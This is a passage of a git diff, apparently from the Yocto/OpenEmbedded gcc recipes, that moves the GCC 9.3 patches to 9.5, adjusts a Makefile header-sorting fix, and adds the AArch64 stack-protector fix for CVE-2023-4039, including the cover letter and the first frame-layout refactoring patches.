+++ b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
@@ -17,6 +17,10 @@ $(sort list) doesn't need this.
Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
Signed-off-by: Khem Raj <raj.khem@gmail.com>
+RP: gcc then added *.h and *.def additions to this list, breaking the original
+fix. Add the sort to the original gcc code, leaving the tr+sort to fix the original
+issue but include the new files too as reported by Zhuang <qiuguang.zqg@alibaba-inc.com>
+
Upstream-Status: Pending
---
gcc/Makefile.in | 2 +-
@@ -31,7 +35,7 @@ index fef6c4c61e3..57cf7804f0a 100644
# files. All other files are flattened to a single directory.
$(mkinstalldirs) $(DESTDIR)$(plugin_includedir)
- headers=`echo $(PLUGIN_HEADERS) $$(cd $(srcdir); echo *.h *.def) | tr ' ' '\012' | sort -u`; \
-+ headers="$(sort $(PLUGIN_HEADERS) $$(cd $(srcdir); echo *.h *.def))"; \
++ headers=`echo $(sort $(PLUGIN_HEADERS)) $$(cd $(srcdir); echo *.h *.def) | tr ' ' '\012' | sort -u`; \
srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'`; \
for file in $$headers; do \
if [ -f $$file ] ; then \
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
index 455858354f..455858354f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
index 2953859238..2953859238 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
index d4445244e2..d4445244e2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
index 6f0833ccda..6f0833ccda 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
index 96da013bf2..96da013bf2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
index 2385099c25..2385099c25 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
index e0129d1f96..e0129d1f96 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
index 1d2182140f..1d2182140f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
index e363c7d445..e363c7d445 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
index 846c0de5e8..846c0de5e8 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
index 102d6fc742..102d6fc742 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
index 443e0a2ca6..443e0a2ca6 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
index 59ac97eaed..59ac97eaed 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
index abfa7516da..abfa7516da 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
index ae8acc7f13..ae8acc7f13 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
index 52a5d97aef..52a5d97aef 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
index bfa7e19dd0..bfa7e19dd0 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
index f8e8c07f62..f8e8c07f62 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
index 60a29fc94d..60a29fc94d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
index 6f048dab82..6f048dab82 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
index f080b0596f..f080b0596f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
index 3b7ccb3e3d..3b7ccb3e3d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
index 5e199fbcfd..5e199fbcfd 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
index 825e070aa3..825e070aa3 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
index f268a4eb58..f268a4eb58 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
index a79fc03d15..a79fc03d15 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
index b69114d1e5..b69114d1e5 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
new file mode 100644
index 0000000000..56d229066f
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
@@ -0,0 +1,1506 @@
+From: Richard Sandiford <richard.sandiford@arm.com>
+Subject: [PATCH 00/19] aarch64: Fix -fstack-protector issue
+Date: Tue, 12 Sep 2023 16:25:10 +0100
+
+This series of patches fixes deficiencies in GCC's -fstack-protector
+implementation for AArch64 when using dynamically allocated stack space.
+This is CVE-2023-4039. See:
+
+https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64
+https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf
+
+for more details.
+
+The fix is to put the saved registers above the locals area when
+-fstack-protector is used.
+
+The series also fixes a stack-clash problem that I found while working
+on the CVE. In unpatched sources, the stack-clash problem would only
+trigger for unrealistic numbers of arguments (8K 64-bit arguments, or an
+equivalent). But it would be a more significant issue with the new
+-fstack-protector frame layout. It's therefore important that both
+problems are fixed together.
+
+Some reorganisation of the code seemed necessary to fix the problems in a
+cleanish way. The series is therefore quite long, but only a handful of
+patches should have any effect on code generation.
+
+See the individual patches for a detailed description.
+
+Tested on aarch64-linux-gnu. Pushed to trunk and to all active branches.
+I've also pushed backports to GCC 7+ to vendors/ARM/heads/CVE-2023-4039.
+
+CVE: CVE-2023-4039
+Upstream-Status: Submitted
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+
+From 78ebdb7b12d5e258b9811bab715734454268fd0c Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Fri, 16 Jun 2023 17:00:51 +0100
+Subject: [PATCH 01/10] aarch64: Explicitly handle frames with no saved
+ registers
+
+If a frame has no saved registers, it can be allocated in one go.
+There is no need to treat the areas below and above the saved
+registers as separate.
+
+And if we allocate the frame in one go, it should be allocated
+as the initial_adjust rather than the final_adjust. This allows the
+frame size to grow to guard_size - guard_used_by_caller before a stack
+probe is needed. (A frame with no register saves is necessarily a
+leaf frame.)
+
+This is a no-op as thing stand, since a leaf function will have
+no outgoing arguments, and so all the frame will be above where
+the saved registers normally go.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_layout_frame): Explicitly
+ allocate the frame in one go if there are no saved registers.
+---
+ gcc/config/aarch64/aarch64.c | 8 +++++---
+ 1 file changed, 5 insertions(+), 3 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index a35dceab9fc..e9dad682738 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4771,9 +4771,11 @@ aarch64_layout_frame (void)
+ max_push_offset = 256;
+
+ HOST_WIDE_INT const_size, const_fp_offset;
+- if (cfun->machine->frame.frame_size.is_constant (&const_size)
+- && const_size < max_push_offset
+- && known_eq (crtl->outgoing_args_size, 0))
++ if (cfun->machine->frame.saved_regs_size == 0)
++ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
++ else if (cfun->machine->frame.frame_size.is_constant (&const_size)
++ && const_size < max_push_offset
++ && known_eq (crtl->outgoing_args_size, 0))
+ {
+ /* Simple, small frame with no outgoing arguments:
+ stp reg1, reg2, [sp, -frame_size]!
+--
+2.34.1
+
+
+From 347487fffa0266d43bf18f1f91878410881f596e Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Fri, 16 Jun 2023 16:55:12 +0100
+Subject: [PATCH 02/10] aarch64: Add bytes_below_hard_fp to frame info
+
+The frame layout code currently hard-codes the assumption that
+the number of bytes below the saved registers is equal to the
+size of the outgoing arguments. This patch abstracts that
+value into a new field of aarch64_frame.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::bytes_below_hard_fp): New
+ field.
+ * config/aarch64/aarch64.c (aarch64_layout_frame): Initialize it,
+ and use it instead of crtl->outgoing_args_size.
+ (aarch64_get_separate_components): Use bytes_below_hard_fp instead
+ of outgoing_args_size.
+ (aarch64_process_components): Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 50 +++++++++++++++++++-----------------
+ gcc/config/aarch64/aarch64.h | 6 ++++-
+ 2 files changed, 32 insertions(+), 24 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index e9dad682738..25cf10cc4b9 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4684,6 +4684,8 @@ aarch64_layout_frame (void)
+ last_fp_reg = regno;
+ }
+
++ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
++
+ if (cfun->machine->frame.emit_frame_chain)
+ {
+ /* FP and LR are placed in the linkage record. */
+@@ -4751,11 +4753,11 @@ aarch64_layout_frame (void)
+ STACK_BOUNDARY / BITS_PER_UNIT);
+
+ /* Both these values are already aligned. */
+- gcc_assert (multiple_p (crtl->outgoing_args_size,
++ gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
+ STACK_BOUNDARY / BITS_PER_UNIT));
+ cfun->machine->frame.frame_size
+ = (cfun->machine->frame.hard_fp_offset
+- + crtl->outgoing_args_size);
++ + cfun->machine->frame.bytes_below_hard_fp);
+
+ cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
+
+@@ -4775,23 +4777,23 @@ aarch64_layout_frame (void)
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+ else if (cfun->machine->frame.frame_size.is_constant (&const_size)
+ && const_size < max_push_offset
+- && known_eq (crtl->outgoing_args_size, 0))
++ && known_eq (cfun->machine->frame.bytes_below_hard_fp, 0))
+ {
+- /* Simple, small frame with no outgoing arguments:
++ /* Simple, small frame with no data below the saved registers.
+ stp reg1, reg2, [sp, -frame_size]!
+ stp reg3, reg4, [sp, 16] */
+ cfun->machine->frame.callee_adjust = const_size;
+ }
+- else if (known_lt (crtl->outgoing_args_size
++ else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
+ + cfun->machine->frame.saved_regs_size, 512)
+ && !(cfun->calls_alloca
+ && known_lt (cfun->machine->frame.hard_fp_offset,
+ max_push_offset)))
+ {
+- /* Frame with small outgoing arguments:
++ /* Frame with small area below the saved registers:
+ sub sp, sp, frame_size
+- stp reg1, reg2, [sp, outgoing_args_size]
+- stp reg3, reg4, [sp, outgoing_args_size + 16] */
++ stp reg1, reg2, [sp, bytes_below_hard_fp]
++ stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+ cfun->machine->frame.callee_offset
+ = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
+@@ -4799,22 +4801,23 @@ aarch64_layout_frame (void)
+ else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
+ && const_fp_offset < max_push_offset)
+ {
+- /* Frame with large outgoing arguments but a small local area:
++ /* Frame with large area below the saved registers, but with a
++ small area above:
+ stp reg1, reg2, [sp, -hard_fp_offset]!
+ stp reg3, reg4, [sp, 16]
+- sub sp, sp, outgoing_args_size */
++ sub sp, sp, bytes_below_hard_fp */
+ cfun->machine->frame.callee_adjust = const_fp_offset;
+ cfun->machine->frame.final_adjust
+ = cfun->machine->frame.frame_size - cfun->machine->frame.callee_adjust;
+ }
+ else
+ {
+- /* Frame with large local area and outgoing arguments using frame pointer:
++ /* General case:
+ sub sp, sp, hard_fp_offset
+ stp x29, x30, [sp, 0]
+ add x29, sp, 0
+ stp reg3, reg4, [sp, 16]
+- sub sp, sp, outgoing_args_size */
++ sub sp, sp, bytes_below_hard_fp */
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
+ cfun->machine->frame.final_adjust
+ = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
+@@ -5243,9 +5246,11 @@ aarch64_get_separate_components (void)
+ if (aarch64_register_saved_on_entry (regno))
+ {
+ poly_int64 offset = cfun->machine->frame.reg_offset[regno];
++
++ /* Get the offset relative to the register we'll use. */
+ if (!frame_pointer_needed)
+- offset += cfun->machine->frame.frame_size
+- - cfun->machine->frame.hard_fp_offset;
++ offset += cfun->machine->frame.bytes_below_hard_fp;
++
+ /* Check that we can access the stack slot of the register with one
+ direct load with no adjustments needed. */
+ if (offset_12bit_unsigned_scaled_p (DImode, offset))
+@@ -5367,8 +5372,8 @@ aarch64_process_components (sbitmap components, bool prologue_p)
+ rtx reg = gen_rtx_REG (mode, regno);
+ poly_int64 offset = cfun->machine->frame.reg_offset[regno];
+ if (!frame_pointer_needed)
+- offset += cfun->machine->frame.frame_size
+- - cfun->machine->frame.hard_fp_offset;
++ offset += cfun->machine->frame.bytes_below_hard_fp;
++
+ rtx addr = plus_constant (Pmode, ptr_reg, offset);
+ rtx mem = gen_frame_mem (mode, addr);
+
+@@ -5410,8 +5415,7 @@ aarch64_process_components (sbitmap components, bool prologue_p)
+ /* REGNO2 can be saved/restored in a pair with REGNO. */
+ rtx reg2 = gen_rtx_REG (mode, regno2);
+ if (!frame_pointer_needed)
+- offset2 += cfun->machine->frame.frame_size
+- - cfun->machine->frame.hard_fp_offset;
++ offset2 += cfun->machine->frame.bytes_below_hard_fp;
+ rtx addr2 = plus_constant (Pmode, ptr_reg, offset2);
+ rtx mem2 = gen_frame_mem (mode, addr2);
+ rtx set2 = prologue_p ? gen_rtx_SET (mem2, reg2)
+@@ -5478,10 +5482,10 @@ aarch64_stack_clash_protection_alloca_probe_range (void)
+ registers. If POLY_SIZE is not large enough to require a probe this function
+ will only adjust the stack. When allocating the stack space
+ FRAME_RELATED_P is then used to indicate if the allocation is frame related.
+- FINAL_ADJUSTMENT_P indicates whether we are allocating the outgoing
+- arguments. If we are then we ensure that any allocation larger than the ABI
+- defined buffer needs a probe so that the invariant of having a 1KB buffer is
+- maintained.
++ FINAL_ADJUSTMENT_P indicates whether we are allocating the area below
++ the saved registers. If we are then we ensure that any allocation
++ larger than the ABI defined buffer needs a probe so that the
++ invariant of having a 1KB buffer is maintained.
+
+ We emit barriers after each stack adjustment to prevent optimizations from
+ breaking the invariant that we never drop the stack more than a page. This
+@@ -5671,7 +5675,7 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ /* Handle any residuals. Residuals of at least MIN_PROBE_THRESHOLD have to
+ be probed. This maintains the requirement that each page is probed at
+ least once. For initial probing we probe only if the allocation is
+- more than GUARD_SIZE - buffer, and for the outgoing arguments we probe
++ more than GUARD_SIZE - buffer, and below the saved registers we probe
+ if the amount is larger than buffer. GUARD_SIZE - buffer + buffer ==
+ GUARD_SIZE. This works that for any allocation that is large enough to
+ trigger a probe here, we'll have at least one, and if they're not large
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index af0bc3f1881..95831637ba7 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -712,9 +712,13 @@ struct GTY (()) aarch64_frame
+ HOST_WIDE_INT saved_varargs_size;
+
+ /* The size of the saved callee-save int/FP registers. */
+-
+ HOST_WIDE_INT saved_regs_size;
+
++ /* The number of bytes between the bottom of the static frame (the bottom
++ of the outgoing arguments) and the hard frame pointer. This value is
++ always a multiple of STACK_BOUNDARY. */
++ poly_int64 bytes_below_hard_fp;
++
+ /* Offset from the base of the frame (incomming SP) to the
+ top of the locals area. This value is always a multiple of
+ STACK_BOUNDARY. */
+--
+2.34.1
+
+
+From 4604c4cd0a6c4c26d6594ec9a0383b4d9197d9df Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 11:25:40 +0100
+Subject: [PATCH 03/10] aarch64: Rename locals_offset to bytes_above_locals
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+locals_offset was described as:
+
+ /* Offset from the base of the frame (incomming SP) to the
+ top of the locals area. This value is always a multiple of
+ STACK_BOUNDARY. */
+
+This is implicitly an “upside down” view of the frame: the incoming
+SP is at offset 0, and anything N bytes below the incoming SP is at
+offset N (rather than -N).
+
+However, reg_offset instead uses a “right way up” view; that is,
+it views offsets in address terms. Something above X is at a
+positive offset from X and something below X is at a negative
+offset from X.
+
+Also, even on FRAME_GROWS_DOWNWARD targets like AArch64,
+target-independent code views offsets in address terms too:
+locals are allocated at negative offsets to virtual_stack_vars.
+
+It seems confusing to have *_offset fields of the same structure
+using different polarities like this. This patch tries to avoid
+that by renaming locals_offset to bytes_above_locals.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::locals_offset): Rename to...
+ (aarch64_frame::bytes_above_locals): ...this.
+ * config/aarch64/aarch64.c (aarch64_layout_frame)
+ (aarch64_initial_elimination_offset): Update accordingly.
+---
+ gcc/config/aarch64/aarch64.c | 9 +++++----
+ gcc/config/aarch64/aarch64.h | 6 +++---
+ 2 files changed, 8 insertions(+), 7 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 25cf10cc4b9..dcaf491af42 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4759,7 +4759,8 @@ aarch64_layout_frame (void)
+ = (cfun->machine->frame.hard_fp_offset
+ + cfun->machine->frame.bytes_below_hard_fp);
+
+- cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
++ cfun->machine->frame.bytes_above_locals
++ = cfun->machine->frame.saved_varargs_size;
+
+ cfun->machine->frame.initial_adjust = 0;
+ cfun->machine->frame.final_adjust = 0;
+@@ -8566,14 +8567,14 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
+
+ if (from == FRAME_POINTER_REGNUM)
+ return cfun->machine->frame.hard_fp_offset
+- - cfun->machine->frame.locals_offset;
++ - cfun->machine->frame.bytes_above_locals;
+ }
+
+ if (to == STACK_POINTER_REGNUM)
+ {
+ if (from == FRAME_POINTER_REGNUM)
+- return cfun->machine->frame.frame_size
+- - cfun->machine->frame.locals_offset;
++ return cfun->machine->frame.frame_size
++ - cfun->machine->frame.bytes_above_locals;
+ }
+
+ return cfun->machine->frame.frame_size;
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index 95831637ba7..a079a88b4f4 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -719,10 +719,10 @@ struct GTY (()) aarch64_frame
+ always a multiple of STACK_BOUNDARY. */
+ poly_int64 bytes_below_hard_fp;
+
+- /* Offset from the base of the frame (incomming SP) to the
+- top of the locals area. This value is always a multiple of
++ /* The number of bytes between the top of the locals area and the top
++ of the frame (the incomming SP). This value is always a multiple of
+ STACK_BOUNDARY. */
+- poly_int64 locals_offset;
++ poly_int64 bytes_above_locals;
+
+ /* Offset from the base of the frame (incomming SP) to the
+ hard_frame_pointer. This value is always a multiple of
+--
+2.34.1
+
+
+From 16016465ff28a75f5e0540cbaeb4eb102fdc3230 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 11:28:11 +0100
+Subject: [PATCH 04/10] aarch64: Rename hard_fp_offset to bytes_above_hard_fp
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
